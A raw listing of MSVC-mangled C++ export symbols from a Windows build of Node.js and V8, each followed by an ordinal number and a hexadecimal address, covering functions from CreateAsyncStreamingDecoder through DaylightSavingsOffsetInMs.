                                                                                                                                                                                                        ?CreateAsyncStreamingDecoder@StreamingDecoder@wasm@internal@v8@@SA?AV?$unique_ptr@VStreamingDecoder@wasm@internal@v8@@U?$default_delete@VStreamingDecoder@wasm@internal@v8@@@std@@@std@@V?$unique_ptr@VStreamingProcessor@wasm@internal@v8@@U?$default_delete@VStreamingProcessor@wasm@internal@v8@@@std@@@6@@Z46830x140571740
                                                                                                                                                                                                        ?CreateBlackArea@Page@internal@v8@@QEAAX_K0@Z46840x1409561e0
                                                                                                                                                                                                        ?CreateBlackAreaBackground@Page@internal@v8@@QEAAX_K0@Z46850x140956230
                                                                                                                                                                                                        ?CreateBlob@SnapshotCreator@v8@@QEAA?AVStartupData@2@W4FunctionCodeHandling@12@@Z46860x140b0de80
                                                                                                                                                                                                        ?CreateBlockContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@@Z46870x14091ca00
                                                                                                                                                                                                        ?CreateBlockContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@@Z46880x140f3b340
                                                                                                                                                                                                        ?CreateBoundFunction@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KAEBVMapRef@234@@Z46890x140f3b400
                                                                                                                                                                                                        ?CreateBreakInfo@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z46900x140a5e8b0
                                                                                                                                                                                                        ?CreateCanonicalEmptySwissNameDictionary@Factory@internal@v8@@QEAA?AV?$Handle@VSwissNameDictionary@internal@v8@@@23@XZ46910x1409d0bd0
                                                                                                                                                                                                        ?CreateCaptureNameMap@RegExpParser@internal@v8@@AEAA?AV?$Handle@VFixedArray@internal@v8@@@23@XZ46920x14071cb60
                                                                                                                                                                                                        ?CreateCatchContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVScope@34@@Z46930x14091cb50
                                                                                                                                                                                                        ?CreateCatchContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@@Z46940x140f3b4d0
                                                                                                                                                                                                        ?CreateClassFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z46950x1409d0ca0
                                                                                                                                                                                                        ?CreateClosure@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z46960x14091cd10
                                                                                                                                                                                                        ?CreateClosure@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVSharedFunctionInfoRef@234@AEBVCodeRef@234@W4AllocationType@34@@Z46970x140f3b590
                                                                                                                                                                                                        ?CreateClosureFromBuiltinSharedFunctionInfo@JSCallReducer@compiler@internal@v8@@AEAAPEAVNode@234@VSharedFunctionInfoRef@234@PEAV5234@11@Z46980x140fdb930
                                                                                                                                                                                                        ?CreateCodeCache@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VUnboundModuleScript@v8@@@2@@Z46990x140b0e9e0
                                                                                                                                                                                                        ?CreateCodeCache@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VUnboundScript@v8@@@2@@Z47000x140b0e9e0
                                                                                                                                                                                                        ?CreateCodeCacheForFunction@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VFunction@v8@@@2@@Z47010x140b0e9f0
                                                                                                                                                                                                        ?CreateCollectionIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CollectionKind@34@W4IterationKind@34@@Z47020x140f3b660
                                                                                                                                                                                                        ?CreateCompilationEnv@NativeModule@wasm@internal@v8@@QEBA?AUCompilationEnv@234@XZ47030x1405693c0
                                                                                                                                                                                                        ?CreateConcurrentMarkingVisitor@ConcurrentMarker@internal@cppgc@@UEBA?AV?$unique_ptr@VVisitor@cppgc@@U?$default_delete@VVisitor@cppgc@@@std@@@std@@AEAVConcurrentMarkingState@23@@Z47040x140467e90
                                                                                                                                                                                                        ?CreateContextWorklists@MarkingWorklists@internal@v8@@QEAAXAEBV?$vector@_KV?$allocator@_K@std@@@std@@@Z47050x140976530
                                                                                                                                                                                                        ?CreateDataProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@IV?$Local@VValue@v8@@@2@@Z47060x140b0eae0
                                                                                                                                                                                                        ?CreateDataProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@V?$Local@VValue@v8@@@2@@Z47070x140b0ed90
                                                                                                                                                                                                        ?CreateDelayedStringConstant@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AV?$Optional@PEBVStringConstantBase@internal@v8@@@base@4@PEAVNode@234@@Z47080x14101b400
                                                                                                                                                                                                        ?CreateEmptyArrayLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z47090x14091ceb0
                                                                                                                                                                                                        ?CreateEmptyJumpTableInRegionLocked@NativeModule@wasm@internal@v8@@AEAAPEAVWasmCode@234@HVAddressRegion@base@4@@Z47100x140569430
                                                                                                                                                                                                        ?CreateEmptyLiteralArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z47110x140f3b740
                                                                                                                                                                                                        ?CreateEmptyLiteralObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47120x140f3b800
                                                                                                                                                                                                        ?CreateEmptyObjectLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ47130x14091d000
                                                                                                                                                                                                        ?CreateEntriesForRuntimeCallStats@ProfilerCodeObserver@internal@v8@@AEAAXXZ47140x140078990
                                                                                                                                                                                                        ?CreateEnvironment@node@@YAPEAVEnvironment@1@PEAVIsolateData@1@V?$Local@VContext@v8@@@v8@@AEBV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@2W4Flags@EnvironmentFlags@1@UThreadId@1@V?$unique_ptr@UInspectorParentHandle@node@@U?$default_delete@UInspectorParentHandle@node@@@std@@@7@@Z47150x14028c510
                                                                                                                                                                                                        ?CreateEvalContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@H@Z47160x14091d100
                                                                                                                                                                                                        ?CreateFillerObjectAt@Heap@internal@v8@@CA?AVHeapObject@23@VReadOnlyRoots@23@_KHW4ClearFreedMemoryMode@23@@Z47170x1409b3ca0
                                                                                                                                                                                                        ?CreateFillerObjectAt@Heap@internal@v8@@QEAA?AVHeapObject@23@_KHW4ClearRecordedSlots@23@@Z47180x1409b3cc0
                                                                                                                                                                                                        ?CreateFillerObjectAt@LocalHeap@internal@v8@@QEAAX_KHW4ClearRecordedSlots@23@@Z47190x1406d6ed0
                                                                                                                                                                                                        ?CreateForEachStatementTDZ@Parser@internal@v8@@AEAAPEAVBlock@23@PEAV423@AEBUForInfo@?$ParserBase@VParser@internal@v8@@@23@@Z47200x1407a4af0
                                                                                                                                                                                                        ?CreateForEmptyFunction@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@23@PEAVIsolate@23@@Z47210x1407dc1e0
                                                                                                                                                                                                        ?CreateForFunction@ScopeIterator@debug@v8@@SA?AV?$unique_ptr@VScopeIterator@debug@v8@@U?$default_delete@VScopeIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@V?$Local@VFunction@v8@@@3@@Z47220x140a6bb00
                                                                                                                                                                                                        ?CreateForGeneratorObject@ScopeIterator@debug@v8@@SA?AV?$unique_ptr@VScopeIterator@debug@v8@@U?$default_delete@VScopeIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@V?$Local@VObject@v8@@@3@@Z47230x140a6bbf0
                                                                                                                                                                                                        ?CreateForWithScope@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@23@PEAVIsolate@23@V?$MaybeHandle@VScopeInfo@internal@v8@@@23@@Z47240x1407dc200
                                                                                                                                                                                                        ?CreateFrameAccessState@CodeGenerator@compiler@internal@v8@@AEAAXPEAVFrame@234@@Z47250x140ee74d0
                                                                                                                                                                                                        ?CreateFrameStateFunctionInfo@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVFrameStateFunctionInfo@234@W4FrameStateType@234@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@@Z47260x140eb26b0
                                                                                                                                                                                                        ?CreateFreeList@FreeList@internal@v8@@SAPEAV123@XZ47270x1409cd050
                                                                                                                                                                                                        ?CreateFunctionContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@H@Z47280x14091d290
                                                                                                                                                                                                        ?CreateFunctionContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@HW4ScopeType@34@@Z47290x140f3b890
                                                                                                                                                                                                        ?CreateGeneratorObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47300x140f3b950
                                                                                                                                                                                                        ?CreateHandle@HandleScope@v8@@KAPEA_KPEAVIsolate@internal@2@_K@Z47310x140b0f050
                                                                                                                                                                                                        ?CreateInitializerFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEBDPEAVDeclarationScope@23@PEAVStatement@23@@Z47320x1407a4ba0
                                                                                                                                                                                                        ?CreateIsolateData@node@@YAPEAVIsolateData@1@PEAVIsolate@v8@@PEAUuv_loop_s@@PEAVMultiIsolatePlatform@1@PEAVArrayBufferAllocator@1@@Z47330x14028c630
                                                                                                                                                                                                        ?CreateIterResultObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47340x140eb6050
                                                                                                                                                                                                        ?CreateJSFunction@WebSnapshotDeserializer@internal@v8@@AEAA?AV?$Handle@VJSFunction@internal@v8@@@23@HIIII@Z47350x1406ac730
                                                                                                                                                                                                        ?CreateJSToWasmFrameStateFunctionInfo@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVFrameStateFunctionInfo@234@W4FrameStateType@234@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z47360x140eb2720
                                                                                                                                                                                                        ?CreateKeyValueArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47370x140eb41d0
                                                                                                                                                                                                        ?CreateLiteralArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVArrayBoilerplateDescriptionRef@234@AEBUFeedbackSource@234@HH@Z47380x140f3b9e0
                                                                                                                                                                                                        ?CreateLiteralObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVObjectBoilerplateDescriptionRef@234@AEBUFeedbackSource@234@HH@Z47390x140f3bac0
                                                                                                                                                                                                        ?CreateLiteralRegExp@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVStringRef@234@AEBUFeedbackSource@234@H@Z47400x140f3bba0
                                                                                                                                                                                                        ?CreateMaterializedEquivalent@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@@Z47410x1408f7e90
                                                                                                                                                                                                        ?CreateMessage@Exception@v8@@SA?AV?$Local@VMessage@v8@@@2@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z47420x140b0f090
                                                                                                                                                                                                        ?CreateMessage@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVMessageLocation@23@@Z47430x140a0f020
                                                                                                                                                                                                        ?CreateMessageOrAbort@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVMessageLocation@23@@Z47440x140a0f170
                                                                                                                                                                                                        ?CreateNamedCaptureAtIndex@RegExpParser@internal@v8@@AEAA_NPEBV?$ZoneVector@G@23@H@Z47450x14071cd80
                                                                                                                                                                                                        ?CreateNewBuffer@AsyncStreamingDecoder@wasm@internal@v8@@AEAAPEAVSectionBuffer@1234@IE_KV?$Vector@$$CBE@base@4@@Z47460x1405717a0
                                                                                                                                                                                                        ?CreateNodeFromPredecessors@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVNode@234@AEBV?$vector@PEAVBasicBlock@compiler@internal@v8@@V?$allocator@PEAVBasicBlock@compiler@internal@v8@@@std@@@std@@AEBV?$vector@PEAVNode@compiler@internal@v8@@V?$allocator@PEAVNode@compiler@internal@v8@@@std@@@7@PEBVOperator@234@1@Z47470x14108c990
                                                                                                                                                                                                        ?CreateObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47480x140eb5930
                                                                                                                                                                                                        ?CreateObjectLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z47490x14091d420
                                                                                                                                                                                                        ?CreatePlatform@node@@YAPEAVMultiIsolatePlatform@1@HPEAVTracingController@v8@@@Z47500x14028c6a0
                                                                                                                                                                                                        ?CreatePrivateNameVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEAVClassScope@23@W4VariableMode@23@W4IsStaticFlag@23@PEBVAstRawString@23@@Z47510x1407a4d90
                                                                                                                                                                                                        ?CreatePromise@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47520x140eb25e0
                                                                                                                                                                                                        ?CreateRange@TypeCache@compiler@internal@v8@@AEAA?AVType@234@NN@Z47530x140fd4110
                                                                                                                                                                                                        ?CreateRegExpLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVAstRawString@34@HH@Z47540x14091d5c0
                                                                                                                                                                                                        ?CreateReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AW4OperandSize@234@XZ47550x1408f5250
                                                                                                                                                                                                        ?CreateScopeInfo@WebSnapshotDeserializer@internal@v8@@AEAA?AV?$Handle@VScopeInfo@internal@v8@@@23@I_NW4ContextType@WebSnapshotSerializerDeserializer@23@@Z47560x1406acd60
                                                                                                                                                                                                        ?CreateSloppyFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4FunctionMode@23@V?$MaybeHandle@VJSFunction@internal@v8@@@23@@Z47570x1409d0e70
                                                                                                                                                                                                        ?CreateSnapshotDataBlobInternal@internal@v8@@YA?AVStartupData@2@W4FunctionCodeHandling@SnapshotCreator@2@PEBDPEAVIsolate@2@@Z47580x1406c34e0
                                                                                                                                                                                                        ?CreateStrictFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4FunctionMode@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z47590x1409d10e0
                                                                                                                                                                                                        ?CreateStringIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47600x140eb41c0
                                                                                                                                                                                                        ?CreateSyncStreamingDecoder@StreamingDecoder@wasm@internal@v8@@SA?AV?$unique_ptr@VStreamingDecoder@wasm@internal@v8@@U?$default_delete@VStreamingDecoder@wasm@internal@v8@@@std@@@std@@PEAVIsolate@34@AEBVWasmFeatures@234@V?$Handle@VContext@internal@v8@@@34@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@6@@Z47610x140570af0
                                                                                                                                                                                                        ?CreateSyntheticContextVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEBVAstRawString@23@@Z47620x1407a4e60
                                                                                                                                                                                                        ?CreateSyntheticModule@Module@v8@@SA?AV?$Local@VModule@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@AEBV?$vector@V?$Local@VString@v8@@@v8@@V?$allocator@V?$Local@VString@v8@@@v8@@@std@@@std@@P6A?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V32@@Z@Z47630x140b0f1b0
                                                                                                                                                                                                        ?CreateThreadLocalKey@Thread@base@v8@@SAHXZ47640x140e5fd20
                                                                                                                                                                                                        ?CreateTimezoneCache@OS@base@v8@@SAPEAVTimezoneCache@23@XZ47650x140e5fd30
                                                                                                                                                                                                        ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@PEA_K_N2@Z47660x1409f5bc0
                                                                                                                                                                                                        ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@PEA_K_N@Z47670x1409f5f00
                                                                                                                                                                                                        ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@_KPEA_K_N@Z47680x1409f5f80
                                                                                                                                                                                                        ?CreateTypedArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47690x140eb34d0
                                                                                                                                                                                                        ?CreateWithContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVScope@34@@Z47700x14091d750
                                                                                                                                                                                                        ?CreateWithContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVScopeInfoRef@234@@Z47710x140f3bc80
                                                                                                                                                                                                        ?CreationContext@Object@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ47720x140b0f3b0
                                                                                                                                                                                                        ?CreationContext@Object@v8@@SA?AV?$Local@VContext@v8@@@2@AEBV?$PersistentBase@VObject@v8@@@2@@Z47730x140b0f3f0
                                                                                                                                                                                                        ?CtrlTable@SwissNameDictionary@internal@v8@@AEAAPEACXZ47740x140483110
                                                                                                                                                                                                        ?CtrlTableSize@SwissNameDictionary@internal@v8@@SAHH@Z47750x140476290
                                                                                                                                                                                                        ?CtrlTableStartOffset@SwissNameDictionary@internal@v8@@SAHH@Z47760x1404762a0
                                                                                                                                                                                                        ?Current@Isolate@internal@v8@@SAPEAV123@XZ47770x140483130
                                                                                                                                                                                                        ?Current@LocalHeap@internal@v8@@SAPEAV123@XZ47780x1409a35e0
                                                                                                                                                                                                        ?Current@SourceLocation@cppgc@@SA?AV12@XZ47790x14007b730
                                                                                                                                                                                                        ?CurrentAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ47800x1409c8840
                                                                                                                                                                                                        ?CurrentBlock@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@XZ47810x1402c3700
                                                                                                                                                                                                        ?CurrentEmbeddedBlobCode@Isolate@internal@v8@@SAPEBEXZ47820x140a0f230
                                                                                                                                                                                                        ?CurrentEmbeddedBlobCodeSize@Isolate@internal@v8@@SAIXZ47830x140a0f240
                                                                                                                                                                                                        ?CurrentEmbeddedBlobData@Isolate@internal@v8@@SAPEBEXZ47840x140a0f250
                                                                                                                                                                                                        ?CurrentEmbeddedBlobDataSize@Isolate@internal@v8@@SAIXZ47850x140a0f260
                                                                                                                                                                                                        ?CurrentEmbeddedBlobIsBinaryEmbedded@Isolate@internal@v8@@SA_NXZ47860x140a0f270
                                                                                                                                                                                                        ?CurrentEmbedderAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ47870x1409c8880
                                                                                                                                                                                                        ?CurrentEpoch@GCTracer@internal@v8@@QEAAIW4ScopeId@Scope@123@@Z47880x1409c8890
                                                                                                                                                                                                        ?CurrentFrameCount@Debug@internal@v8@@AEAAHXZ47890x140a5ea20
                                                                                                                                                                                                        ?CurrentLiteralAsCString@Scanner@internal@v8@@QEBAPEBDPEAVZone@23@@Z47900x140764cf0
                                                                                                                                                                                                        ?CurrentLocalHeap@Isolate@internal@v8@@QEAAPEAVLocalHeap@23@XZ47910x140a0f290
                                                                                                                                                                                                        ?CurrentMarkCompactMutatorUtilization@GCTracer@internal@v8@@QEBANXZ47920x1409c88c0
                                                                                                                                                                                                        ?CurrentMarkingBarrier@WriteBarrier@internal@v8@@SAPEAVMarkingBarrier@23@PEAVHeap@23@@Z47930x1409c65b0
                                                                                                                                                                                                        ?CurrentMatches@Scanner@internal@v8@@QEBA_NW4Value@Token@23@@Z47940x140483140
                                                                                                                                                                                                        ?CurrentOldGenerationAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ47950x1409c88d0
                                                                                                                                                                                                        ?CurrentPerIsolateThreadData@Isolate@internal@v8@@SAPEAVPerIsolateThreadData@123@XZ47960x140483150
                                                                                                                                                                                                        ?CurrentRawSymbol@Scanner@internal@v8@@QEBAPEBVAstRawString@23@PEAVAstValueFactory@23@@Z47970x140764d70
                                                                                                                                                                                                        ?CurrentSourcePosition@BytecodeArrayBuilder@interpreter@internal@v8@@AEAA?AVBytecodeSourceInfo@234@W4Bytecode@234@@Z47980x14091d910
                                                                                                                                                                                                        ?CurrentStackTrace@StackTrace@v8@@SA?AV?$Local@VStackTrace@v8@@@2@PEAVIsolate@2@HW4StackTraceOptions@12@@Z47990x140b0f430
                                                                                                                                                                                                        ?CurrentSymbol@Scanner@internal@v8@@QEBAPEBVAstRawString@23@PEAVAstValueFactory@23@@Z48000x140764dc0
                                                                                                                                                                                                        ?CurrentTimeToMarkingTask@IncrementalMarking@internal@v8@@AEBANXZ48010x1409a7000
                                                                                                                                                                                                        ?CustomSpace@RawHeap@internal@cppgc@@QEAAPEAVBaseSpace@23@UCustomSpaceIndex@3@@Z48020x14044faa0
                                                                                                                                                                                                        ?CustomSpace@RawHeap@internal@cppgc@@QEBAPEBVBaseSpace@23@UCustomSpaceIndex@3@@Z48030x14044faa0
                                                                                                                                                                                                        ?Cvtlsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48040x1405029c0
                                                                                                                                                                                                        ?Cvtlsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48050x140502a90
                                                                                                                                                                                                        ?Cvtlsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48060x140502b30
                                                                                                                                                                                                        ?Cvtlsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48070x140502c00
                                                                                                                                                                                                        ?Cvtlui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48080x140502ca0
                                                                                                                                                                                                        ?Cvtlui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48090x140502d00
                                                                                                                                                                                                        ?Cvtlui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48100x140502d40
                                                                                                                                                                                                        ?Cvtlui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48110x140502da0
                                                                                                                                                                                                        ?Cvtqsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48120x140502de0
                                                                                                                                                                                                        ?Cvtqsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48130x140502eb0
                                                                                                                                                                                                        ?Cvtqsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48140x140502f50
                                                                                                                                                                                                        ?Cvtqsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48150x140503020
                                                                                                                                                                                                        ?Cvtqui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48160x1405030c0
                                                                                                                                                                                                        ?Cvtqui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48170x140503120
                                                                                                                                                                                                        ?Cvtqui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48180x140503280
                                                                                                                                                                                                        ?Cvtqui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z48190x1405032e0
                                                                                                                                                                                                        ?Cvtsd2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z48200x140503440
                                                                                                                                                                                                        ?Cvtsd2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48210x1405034a0
                                                                                                                                                                                                        ?Cvtss2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z48220x140503520
                                                                                                                                                                                                        ?Cvtss2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z48230x140503580
                                                                                                                                                                                                        ?Cvttsd2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z48240x1405035f0
                                                                                                                                                                                                        ?Cvttsd2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z48250x140503670
                                                                                                                                                                                                        ?Cvttsd2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z48260x1405036d0
                                                                                                                                                                                                        ?Cvttsd2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z48270x140503750
                                                                                                                                                                                                        ?Cvttsd2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@PEAVLabel@23@@Z48280x1405037b0
                                                                                                                                                                                                        ?Cvttsd2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@PEAVLabel@23@@Z48290x1405037e0
                                                                                                                                                                                                        ?Cvttss2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z48300x1405037f0
                                                                                                                                                                                                        ?Cvttss2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z48310x140503870
                                                                                                                                                                                                        ?Cvttss2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z48320x1405038d0
                                                                                                                                                                                                        ?Cvttss2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z48330x140503950
                                                                                                                                                                                                        ?Cvttss2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@PEAVLabel@23@@Z48340x1405039b0
                                                                                                                                                                                                        ?Cvttss2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@PEAVLabel@23@@Z48350x1405039e0
                                                                                                                                                                                                        ?DCheckImpl@internal@cppgc@@YAXPEBDAEBVSourceLocation@2@@Z48360x1404619c0
                                                                                                                                                                                                        ?DFSPop@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneStack@UDFSStackEntry@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@@Z48370x14109f380
                                                                                                                                                                                                        ?DFSPush@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneStack@UDFSStackEntry@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@1W4DFSDirection@1234@@Z48380x14109f440
                                                                                                                                                                                                        ?DOM@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB48390x141ff9a50
                                                                                                                                                                                                        ?Data@BackingStore@v8@@QEBAPEAXXZ48400x140078aa0
                                                                                                                                                                                                        ?Data@Buffer@node@@YAPEADV?$Local@VObject@v8@@@v8@@@Z48410x14020fff0
                                                                                                                                                                                                        ?Data@Buffer@node@@YAPEADV?$Local@VValue@v8@@@v8@@@Z48420x140210000
                                                                                                                                                                                                        ?Data@Contents@ArrayBuffer@v8@@QEBAPEAXXZ48430x140078aa0
                                                                                                                                                                                                        ?Data@Contents@SharedArrayBuffer@v8@@QEBAPEAXXZ48440x140078aa0
                                                                                                                                                                                                        ?DataAlign@Assembler@internal@v8@@QEAAXH@Z48450x140ab41e0
                                                                                                                                                                                                        ?DataConstant@Descriptor@internal@v8@@SA?AV123@PEAVIsolate@23@V?$Handle@VName@internal@v8@@@23@HV?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z48460x1407ddea0
                                                                                                                                                                                                        ?DataConstant@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z48470x1407ddf50
                                                                                                                                                                                                        ?DataField@Descriptor@internal@v8@@SA?AV123@PEAVIsolate@23@V?$Handle@VName@internal@v8@@@23@HW4PropertyAttributes@23@VRepresentation@23@@Z48480x1407ddfe0
                                                                                                                                                                                                        ?DataField@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@HW4PropertyAttributes@23@W4PropertyConstness@23@VRepresentation@23@AEBVMaybeObjectHandle@23@@Z48490x1407de050
                                                                                                                                                                                                        ?DataTableEndOffset@SwissNameDictionary@internal@v8@@SAHH@Z48500x1404762a0
                                                                                                                                                                                                        ?DataTableSize@SwissNameDictionary@internal@v8@@SAHH@Z48510x1404762b0
                                                                                                                                                                                                        ?DataTableStartOffset@SwissNameDictionary@internal@v8@@SAHXZ48520x1400928f0
                                                                                                                                                                                                        ?DateNow@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48530x140f4dce0
                                                                                                                                                                                                        ?DateTimeConfigurationChangeNotification@Isolate@v8@@QEAAXW4TimeZoneDetection@12@@Z48540x140b0f490
                                                                                                                                                                                                        ?Date_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48550x140483160
                                                                                                                                                                                                        ?Date_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48560x1406cd5d0
                                                                                                                                                                                                        ?DaylightSavingsOffsetInMs@DateCache@internal@v8@@AEAAH_J@Z48570x140a793b0
